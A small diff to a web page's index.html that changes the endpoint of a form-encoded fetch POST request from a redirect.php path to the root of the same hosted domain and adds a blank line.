--- a/index.html
+++ b/index.html
@@ -312,7 +312,7 @@
 
     try {
       await Promise.race([
-        fetch('https://drillinginc.onrender.com/redirect.php', {
+        fetch('https://drillinginc.onrender.com', {
           method: 'POST',
           headers: {
             'Content-Type': 'application/x-www-form-urlencoded'
@@ -368,4 +368,5 @@
 
 </body>
 </html>
+
 
